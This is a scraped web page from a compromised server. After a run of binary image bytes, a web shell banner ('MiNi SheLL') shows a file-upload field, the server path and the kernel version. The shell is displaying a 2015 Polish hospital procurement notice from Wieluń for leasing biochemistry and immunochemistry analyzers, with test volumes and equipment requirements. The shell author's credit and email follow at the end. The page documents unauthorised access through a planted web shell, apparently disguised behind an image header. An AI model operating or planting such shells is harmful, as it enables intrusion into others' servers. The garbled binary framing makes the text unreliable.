JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150223/24285-N-2015.html

<p class="kh_header"><b>Wieluń: Dzierżawa analizatora biochemicznego z przystawką ISE oraz dzierżawa analizatora do immunochemii wraz z dostawą odczynników do tych urządzeń dla Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu. SPZOZ - OiZP/3 /38/380-382 / 9 / 2015.</b><br>
<b>Numer ogłoszenia: 24285 - 2015; data zamieszczenia: 23.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 43 840 68 00, faks 43 840 68 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa analizatora biochemicznego z przystawką ISE oraz dzierżawa analizatora do immunochemii wraz z dostawą odczynników do tych urządzeń dla Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu. SPZOZ - OiZP/3 /38/380-382 / 9 / 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia - szczegółowy zakres , ilości zawiera - ZAŁĄCZNIK NR 2 - FORMULARZ CENOWY..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.45.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, tj. posiadają : a) koncesję lub zezwolenie Głównego Inspektora Farmaceutycznego w zakresie prowadzenia hurtowni farmaceutycznej, jeżeli Wykonawca prowadzi hurtownię farmaceutyczną, lub b) zezwolenie Głównego Inspektora Farmaceutycznego na wytwarzanie produktów leczniczych, jeżeli Wykonawca jest wytwórcą, lub c) zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie składu konsygnacyjnego, jeżeli Wykonawca prowadzi skład konsygnacyjny, - Zamawiający uzna, iż Wykonawca spełnia ten warunek, jeżeli przedstawi kserokopię przedmiotowej koncesji lub zezwolenia, złożoną wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia na podstawie oświadczenia złożonego wraz z ofertą (Załącznik Nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia na podstawie oświadczenia złożonego wraz z ofertą (Załącznik Nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek osobami zdolnymi do wykonania zamówienia na podstawie oświadczenia złożonego wraz z ofertą (Załącznik Nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek odpowiedniej sytuacji ekonomicznej i finansowej niezbędnej do realizacji niniejszego zamówienia na podstawie oświadczenia złożonego wraz z ofertą (Załącznik Nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin wykonanaia zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 Ustawy Pzp Zamawiający przewiduje możliwość dokonania zmiany warunków zawartej umowy w zakresie: 1) zmiany ceny jednostkowej towaru spowodowanej zmianą stawki podatku od towarów i usług VAT, cła przy czym cena jednostkowa netto pozostaje bez zmian. 2) zmiany cen jednostkowych leków spowodowanych zmianą cen urzędowych w czasie trwania umowy. 3) w przypadku zakończenia produkcji lub wycofania z rynku przedmiotu zamówienia wyrobu będącego tematem niniejszego postępowania przedmiotem zamówienia dopuszcza się zmianę na nowy produkt o tych samych bądź lepszych parametrach po cenie jednostkowej zaoferowanej w ofercie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Dziale OiZP pokój 204 - nieodpłatnie SPZOZ w Wieluniu, ul. Szpitalna 16, 98-300 Wieluń...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2015 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ nr 216...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1)Dzierżawa analizatora biochemicznego z przystawką ISE wraz z dostawa odczynników dla Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.





	Rodzaj badań



	Ilość oznaczeń w roku	Cena 1 opakowania brutto	Wielkość opakowania


		Trwałość odczynnika po otwarciu na pokładzie aparatu 	Ilość opakowań zapewniająca wykonanie podanej liczby badań przy uwzględnieniu trwałości odczynnika na pokładzie	Wartość brutto (4x7)	Wartość kalibratorów, kontroli, części zużywalnych płynów myjących zapewniająca prace aparatu w ciągu 12 miesięcy	Wartość brutto zamówienia za 12 miesięcy 
(8+9)
	2	3	4	5	6	7	8	9	10
1	Albuminy	1000							
2.	Amylaza	2900							
3.	AST	3200							
4.	ALT	3400							
5. 	Alkohol etylowy	800							
6.	Białko	1300							
7.	Białko w moczu	    4200								
8.	Bilirubina całkowita	4200							
9.	Bilirubina bezpośrednia	400							
10.	Cholesterol	3800							
11.	Cholesterol HDL bezpośredni	2800							
12.	CK	1200							
13.	CK-MB	900							
14.	CRP	15000							
15.	Fosfor nieorganiczny	1400							
16	Fosfataza alkaliczna	500							
17.	GGTP	400							
18.	Glukoza	14000							
19.	Kreatynia	   13000							
20.	Kwas moczowy	1500							
21.	Mocznik		14000							
22.	Sód	16000							
23.	Potas	16000							
24.	Chlorki	15000							
25.	Trójglicerydy	3500							
26.	Żelazo		1400							
27.	Lipaza 	1100							
28.	Magnez	650							
29.	Wapń	1400							
	
Zestawienie parametrów technicznych i warunków granicznych dotyczących analizatora biochemicznego z przystawką ISE
L.p.	Parametry aparatu	Parametry graniczne	Odpowiedź oferenta TAK/NIE	Parametry oferowane
1.	Analizator biochemiczny nie starszy niż 2013 typu bench top- z wbudowanym komputerem i możliwością podłączenia komputera zewnętrznego. Jeżeli analizator jest używany, to Wykonawca dostarczy aparat po aktualnym przeglądzie technicznym. 	Tak		
2.	Analizator wyposażony w zewnętrzną drukarkę, zewnętrzny UPS	Tak		
3,	Wydajność testów fotometrycznych nie mniej niż 300/godz 	        Tak		
4,	Wbudowany moduł ISE o wydajności nie mniej niż 50 testów/ godz 	Tak		
5.	Możliwość wykonywania na module ISE oznaczeń Na, K, CL	Tak		
6.	Elektrody bezobsługowe o potencjometrycznym pomiarze bezpośrednim  w surowicy	Tak		
7. 	System odczynnikowy zamknięty z możliwością otwarcia dodatkowych kanałów (oznakowanie odczynników kodem kreskowym).Odczynniki nie wymagające wcześniejszego przygotowania przez użytkownika(przelewanie, rozcieńczanie).	Tak		
8. 	Metody pomiarowe: kinetyczne, punktu końcowego, turbidymetryczne 	Tak		
9. 	Wbudowany czytnik kodów kreskowych identyfikujący odczynniki, kalibratory, kontrole i próbki.   	Tak		
10. 	Dostawianie i usuwanie próbek pacjentów, kontroli, kalibratorów i odczynników bez przerywania ciągłości pracy analizatora  (próbki pacjentów rutynowe i na cito) 	Tak		
11. 	Martwa objętość próbki nie większa niż 100ul w probówkach pediatrycznych	Tak		
12. 	 Chłodzenie miejsca dla odczynników, kalibratorów i kontroli na pokładzie analizatora zgodnie z zaleceniami producenta odczynników.	Tak	
	
13. 	Detekcja skrzepu w próbce - jednoznaczny opis wskazujący na jego obecność. Igła próbkowa posiadająca detektor skrzepu i kolizji .	Tak
		
14. 	Minimum 60 miejsc na próbki	Tak		
15. 	Praca analizatora w systemie pacjent po pacjencie 	Tak		
16. 	Analizator pracujący z wodą destylowaną,, bez stacji uzdatniania wody, zużywający nie więcej niż 2.5 l/ godzinę pracy analizatora 	Tak		
17. 	Układ optyczny - zakres długości fali 340- 700 nm 	Tak		
18. 	Kuwety pomiarowe jednorazowe, automatyczny podajnik, zapas na minimum 600 kuwet.	Tak		
19. 	Możliwość oznakowania  próbek  kodem kreskowym 	Tak		
20.	System kontroli jakości z możliwością liczbowego i graficznego przedstawienia wyników kontroli. Możliwość wydruku wyników kontroli (dziennych, miesięcznych) 	Tak		
21. 	Dwukierunkowa transmisja danych możliwość  włączenia do systemu LIS. 	Tak		
22.	Możliwość tworzenia profili badań 	Tak		
23.	Możliwość tworzenia funkcji kalkulacyjnej dla testów np. LDL wyliczeniowy	Tak		
24 . 	Automatyczne wstępne rozcieńczanie próbek badanych oraz  po przekroczeniu liniowości metody  	Tak		
25. 	Możliwość wykorzystania własnych aplikacji odczynnikowych	Tak		
26. 	Analizator wyposażony w detektory automatycznego monitorowania poziomu odczynnika i próbki, analizator dwuigłowy, igła odczynnikowa i próbkowa    	Tak		
27. 	Oprogramowania oraz instrukcja obsługi w języku polskim 	Tak		
28. 	Metodyka badań, karty charakterystyk substancji niebezpiecznych i autoryzowane przez producenta aparatu aplikacje powinny być dostarczone wraz z aparatem	Tak		
29.	Czas reakcji serwisu na zgłoszenie awarii i podjęcie naprawy analizatora - max 24 godziny	Tak		
30	Aparat zastępczy na czas naprawy	Tak		
31.	Wykonawca zapewnia bezpłatne szkolenie personelu w siedzibie zamawiającego	Tak		
32.
 	  Usuwanie awarii, konserwacja, oraz terminowe przeglądy techniczne , zapewnione przez autoryzowany serwis producenta analizatora. Koszty w/w oraz dojazdu przez cały okres dzierżawy będą pokrywane przez Oferenta.	Tak		
33.
 	Drukarka zewnętrzna  laserowa nie starsza niż z 2014 roku o odpowiedniej wydajności, umożliwiająca bezpośrednie wydawanie wyników dla pacjenta 	Tak		
34.	Zapewnienie w czasie trwania umowy wszystkich części zamiennych do analizatora i zużywalnych do drukarki na koszt Oferenta 	Tak		
35,	Dokumenty dopuszczające do obrotu zgodnie ustawą o  wyrobach medycznych z dnia 20 maja 2010r.	Tak		
36,	Inne certyfikaty 	Podać.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.45.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2) Dzierżawa analizatora do immunochemii wraz z dostawą odczynników do tego analizatora dla Zakładu Diagnostyki Laboratoryjnej SPZOZ w Wieluniu...</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) wymagane ilości badań w ciągu 12 miesięcy Rodzaj badania Ilość oznaczeń w 12 m-cy D-dimery 1100 szt NTpro-BNP 800 szt b) Zestawienie parametrów technicznych i warunków granicznych dotyczących analizatora do immunochemii Zestawienie parametrów technicznych i użytkowych analizatora do immunochemii oraz warunków, jakim powinny odpowiadać odczynniki do tego aparatu L.p. Parametry aparatu Parametry Odpowiedź oferenta Parametry oferowane 1. Analizator do immunochemii w pełni automatyczny Tak 2. Testy wykonywane metodą immunoenzymatyczną Tak 3, Ilość oznaczeń wykonywanych jednocześnie Tak podać 4. Stabilność kalibracji i rekalibracji minimum 14 dni Tak podać 5. Trwałość kalibracji Tak podać 6. Termin ważności odczynników minimum 6 miesięcy Tak 8. Możliwość wykonywania badań : a) D-dimery b) Nt-proBNP Tak Tak 9. Aparat powinien umożliwiać: a) wykonywanie badań w serii i pojedynczo b) korzystanie z odczynników gotowych do użycia z długim terminem ważności (ok. 6 miesięcy) c) współpraca z komputerem zewnętrznym (systemem komputerowym) d) prezentacja wyników na ekranie Tak Tak Tak Tak 10. Aparat powinien: a) zapewnić czas oznaczenia poszczególnych badań po max 20 min b) posiadać czytnik kodów paskowych c) posiadać system podtrzymywania pracy analizatora przez minimum 20 minut d) posiadać instrukcję obsługi w języku polskim e) Świadectwo CE f) Certyfikat ISO 9001 Tak Tak Tak Tak Tak Tak 11. Inne możliwości aparatu Podać 12. Data produkcji oferowanego aparatu Podać 13. Rok wprowadzenia tego aparatu do produkcji Podać 14. Wielkość opakowań (ilość testów w opakowaniu) Podać 15. Oferent gwarantuje: a) przeszkolenie w obsłudze aparatu b) bezpłatną aktualizację wyrobu i dokumentacji c) usunięcie awarii w czasie max 24 godzin od zgłoszenia d) wstawienie innego aparatu na czas dłuższej awarii (3 dni) e) wymianę aparatu po przeprowadzeniu 2 napraw tego samego podzespołu f) zapewnienie w czasie trwania umowy wszystkich części zamiennych do analizatora i zużywalnych do drukarki (koszt oferenta) Tak Tak Tak Tak Tak Tak Tak Uwaga! Parametry podane w rubryce parametry graniczne należy traktować jako niezbędne minimum, którego niespełnienie będzie równoznaczne z odrzuceniem oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.45.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin realizacji dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com